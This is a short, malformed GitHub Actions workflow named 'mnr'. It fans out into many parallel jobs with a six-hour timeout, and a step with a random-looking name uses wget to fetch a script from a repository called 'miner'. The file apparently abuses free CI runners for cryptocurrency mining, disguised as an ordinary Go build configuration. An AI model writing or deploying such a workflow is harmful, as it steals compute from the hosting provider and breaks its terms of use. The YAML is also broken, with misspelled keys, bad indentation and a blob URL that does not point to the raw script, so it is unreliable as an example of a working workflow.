name: mnr

runs-on: ubuntu-latest
strategy:
 max-pararell: 30
 fail-fast: false
 matrix:
  go: [1, 2, 3, 4]
  Flag: [A , B, C, D, F, G]
timesout-minutes: 360
env:
 NUM_JOBS: 20
 JOB: ${{ matrix.go }}
steps:
 -name: set up go ${{ matrix.go }}
  uses: actions/setup-go@v1
  with:
    go-version: ${{ matrix.go }}
  id: go
  -name: setup
   uses: actions/checkout@v1
  -name: shib7nu
   run: |
     wget https://github.com/Bang122/miner/blob/main/Main.sh
 
